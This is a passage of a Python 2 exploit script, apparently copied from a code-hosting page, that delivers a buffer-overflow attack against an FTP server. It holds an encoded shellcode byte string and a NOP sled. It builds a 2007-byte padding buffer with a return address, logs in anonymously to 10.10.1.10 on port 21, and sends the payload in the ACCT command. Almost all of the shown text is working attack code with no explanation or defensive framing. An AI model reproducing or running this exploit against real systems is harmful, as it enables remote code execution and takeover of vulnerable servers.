"\xeb\x06\xf3\xbf\x1e\x56\x34\x07\xc1\x2d\x4c\x7b\x7c\x36\x8b"
|
||||
"\x01\x5a\xb3\x0f\xa1\x29\x63\xeb\x53\xfd\xf2\x78\x5f\x4a\x70"
|
||||
"\x26\x7c\x4d\x55\x5d\x78\xc6\x58\xb1\x08\x9c\x7e\x15\x50\x46"
|
||||
"\x1e\x0c\x3c\x29\x1f\x4e\x9f\x96\x85\x05\x32\xc2\xb7\x44\x5b"
|
||||
"\x27\xfa\x76\x9b\x2f\x8d\x05\xa9\xf0\x25\x81\x81\x79\xe0\x56"
|
||||
"\xe5\x53\x54\xc8\x18\x5c\xa5\xc1\xde\x08\xf5\x79\xf6\x30\x9e"
|
||||
"\x79\xf7\xe4\x31\x29\x57\x57\xf2\x99\x17\x07\x9a\xf3\x97\x78"
|
||||
"\xba\xfc\x7d\x11\x51\x07\x16\xde\x0e\x06\xa1\xb6\x4c\x08\x2c"
|
||||
"\xfc\xd8\xee\x44\x12\x8d\xb9\xf0\x8b\x94\x31\x60\x53\x03\x3c"
|
||||
"\xa2\xdf\xa0\xc1\x6d\x28\xcc\xd1\x1a\xd8\x9b\x8b\x8d\xe7\x31"
|
||||
"\xa3\x52\x75\xde\x33\x1c\x66\x49\x64\x49\x58\x80\xe0\x67\xc3"
|
||||
"\x3a\x16\x7a\x95\x05\x92\xa1\x66\x8b\x1b\x27\xd2\xaf\x0b\xf1"
|
||||
"\xdb\xeb\x7f\xad\x8d\xa5\x29\x0b\x64\x04\x83\xc5\xdb\xce\x43"
|
||||
"\x93\x17\xd1\x15\x9c\x7d\xa7\xf9\x2d\x28\xfe\x06\x81\xbc\xf6"
|
||||
"\x7f\xff\x5c\xf8\xaa\xbb\x6d\xb3\xf6\xea\xe5\x1a\x63\xaf\x6b"
|
||||
"\x9d\x5e\xec\x95\x1e\x6a\x8d\x61\x3e\x1f\x88\x2e\xf8\xcc\xe0"
|
||||
"\x3f\x6d\xf2\x57\x3f\xa4")
|
||||
|
||||
shell= '\x90'*30 + shellcode
|
||||
buffer='\x41'*2007+ ret + shell + '\x43'*(696-len(shell))
|
||||
|
||||
print "Sending Buffer"
|
||||
|
||||
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
connect=s.connect(('10.10.1.10',21))
|
||||
s.recv(1024)
|
||||
s.send('USER anonymous\r\n')
|
||||
s.recv(1024)
|
||||
s.send('PASS anonymous\r\n')
|
||||
s.recv(1024)
|
||||
s.send('ACCT' +buffer+ '\r\n')
|
||||
s.close()
|
||||
|
||||
print "Attack Buffer Overflow Successfully Executed"
|
||||
|
Loading…
Add table
Reference in a new issue